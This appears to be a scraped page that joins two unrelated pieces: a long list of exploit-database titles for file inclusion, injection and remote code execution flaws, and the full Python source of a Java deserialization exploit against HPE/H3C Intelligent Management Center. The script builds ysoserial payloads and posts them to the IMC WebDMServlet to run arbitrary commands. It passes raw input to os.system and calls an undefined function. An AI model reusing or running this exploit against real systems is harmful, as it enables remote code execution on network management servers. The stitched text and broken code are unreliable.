Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion
Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion

Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion
Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion

Zorum 3.5 - DBProperty.php Remote File Inclusion
Zorum 3.5 - 'DBProperty.php' Remote File Inclusion

PHPMyConferences 8.0.2 - Init.php Remote File Inclusion
PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion

PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion
PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion

PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion
PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion

The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion
The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion

KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion
KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion

NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion
NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion

Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion
Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion

@cid Stats 2.3 - Install.php3 Remote File Inclusion
@cid Stats 2.3 - 'Install.php3' Remote File Inclusion

PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion
PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion

PHPdebug 1.1 - Debug_test.php Remote File Inclusion
PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion
eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion
Easy Banner Pro 2.8 - info.php Remote File Inclusion
Edit-X - Edit_Address.php Remote File Inclusion
Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion
Edit-X - 'Edit_Address.php' Remote File Inclusion

OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion
OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion

PHPProbid 5.24 - Lang.php Remote File Inclusion
PHPProbid 5.24 - 'Lang.php' Remote File Inclusion

MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion
MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion

Meganoide's News 1.1.1 - Include.php Remote File Inclusion
Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion

Shop Kit Plus - StyleCSS.php Local File Inclusion
Shop Kit Plus - 'StyleCSS.php' Local File Inclusion
Pickle 0.3 - download.php Local File Inclusion
Active Calendar 1.2 - showcode.php Local File Inclusion
Pickle 0.3 - 'download.php' Local File Inclusion
Active Calendar 1.2 - 'showcode.php' Local File Inclusion

JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion
JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion

Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion
Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion

WordPress < 2.1.2 - PHP_Self Cross-Site Scripting
WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting

Satel Lite - Satellite.php Local File Inclusion
Satel Lite - 'Satellite.php' Local File Inclusion

eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion
eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion

MyNews 4.2.2 - Week_Events.php Remote File Inclusion
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion
Actionpoll 1.1 - Actionpoll.php Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion
Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion

Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion
Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion

PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion
PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion
Allfaclassifieds 6.04 - Level2.php Remote File Inclusion
PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion
Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion
PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion

ACVSWS - Transport.php Remote File Inclusion
ACVSWS - 'Transport.php' Remote File Inclusion

Lms 1.5.x - RTMessageAdd.php Remote File Inclusion
Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion
MyNewsGroups 0.6 - Include.php Remote File Inclusion
PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion
MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion
PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion

Comus 2.0 - Accept.php Remote File Inclusion
Comus 2.0 - 'Accept.php' Remote File Inclusion
HTMLEditBox 2.2 - config.php Remote File Inclusion
DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion
DynaTracker 1.5.1 - action.php base_path Remote File Inclusion
HTMLEditBox 2.2 - 'config.php' Remote File Inclusion
DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion

Doruk100Net - Info.php Remote File Inclusion
Doruk100Net - 'Info.php' Remote File Inclusion

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion
PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion

PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion
PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion

PHPHostBot 1.05 - Authorize.php Remote File Inclusion
PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion

PHMe 0.0.2 - Function_List.php Local File Inclusion
PHMe 0.0.2 - 'Function_List.php' Local File Inclusion
VietPHP - _functions.php dirpath Parameter Remote File Inclusion
VietPHP - admin/index.php language Parameter Remote File Inclusion
VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion
VietPHP - 'admin/index.php' language Parameter Remote File Inclusion

Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion
Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion

Shoutbox 1.0 - Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion
Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion
Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion
Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion
Dalai Forum 1.1 - forumreply.php Local File Inclusion
Firesoft - Class_TPL.php Remote File Inclusion
Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion
Firesoft - 'Class_TPL.php' Remote File Inclusion

PHP-Nuke 8.0 - autohtml.php Local File Inclusion
PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion

Content Builder 0.7.5 - postComment.php Remote File Inclusion
Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion

Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion
Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion

PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion
PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion

Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion
Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion

MyBlog 1.x - Games.php ID Remote File Inclusion
MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion

PHPMyTourney 2 - tourney/index.php Remote File Inclusion
PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion
W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion

XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion
XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion

Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell
Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell

C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting
C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting

C99 Shell - 'c99.php' Authentication Bypass
C99Shell (Web Shell) - 'c99.php' Authentication Bypass

W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion
W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion

Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution
Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution

MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution
MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution

Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution

Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM
Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection

Nuts CMS - Remote PHP Code Injection / Execution
Nuts CMS - PHP Remote Code Injection / Execution

WordPress Plugin WP Super Cache - Remote PHP Code Execution
WordPress Plugin WP Super Cache - PHP Remote Code Execution

b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection
b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection

Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion
Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion

XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection
XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection

ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials Remote SYSTEM Code Execution
ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution

Apache - HTTP OPTIONS Memory Leak
Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak
Foodspotting Clone 1.0 - SQL Injection
iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection
Tecnovision DLX Spot - Authentication Bypass
Tecnovision DLX Spot - Arbitrary File Upload
2017-09-20 05:01:20 +00:00

104 lines
4.3 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""
def printUsage () :
print "......................................................................................................................"
print "."
print ". HPE/H3C - IMC Java Deserialization Exploit"
print "."
print ". Example 1: -payload-binary"
print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
print ". 2. Send request to server"
print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print "."
print ". Example 2: -payload-string"
print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print "."
print "......................................................................................................................"
def loadPayloadFile (_fileName) :
print "[+] Load payload file %s" % _fileName
payloadFile = open(_fileName, 'rb')
payloadFile_read = payloadFile.read()
return payloadFile_read
def exploit (_payload) :
url = sys.argv[1]
url += "/imc/topo/WebDMServlet"
print "[+] Sending exploit to %s" % (url)
data = _payload
response = requests.post(url, data=data, verify=False)
return response
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
if __name__ == "__main__":
if len(sys.argv) < 4:
printUsage()
sys.exit(0)
else:
print "------------------------------------------"
print "- HPE/H3C - IMC Java Deserialization Exploit -"
print "------------------------------------------"
host = sys.argv[1]
print "[*] Connecting to %s" %host
if sys.argv[2] == "-payload-binary":
payload_file = sys.argv[3]
if os.path.isfile(payload_file):
payload = loadPayloadFile(payload_file)
response = exploit(payload)
showResponse(response.content)
else:
print "[-] Can't load payload file"
elif sys.argv[2] == "-payload-string":
if os.path.isfile("ysoserial.jar"):
sPayload = sys.argv[3]
sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
print "[+] Create payload file (%s) " %sPayload
os.system(sPayload)
payload = loadPayloadFile(payload_file)
response = exploit(payload)
print "[+] Response received, exploit finished."
else:
print "[-] Can't load ysoserial.jar"
else:
printUsage()
Reference in a new issue View git blame Copy permalink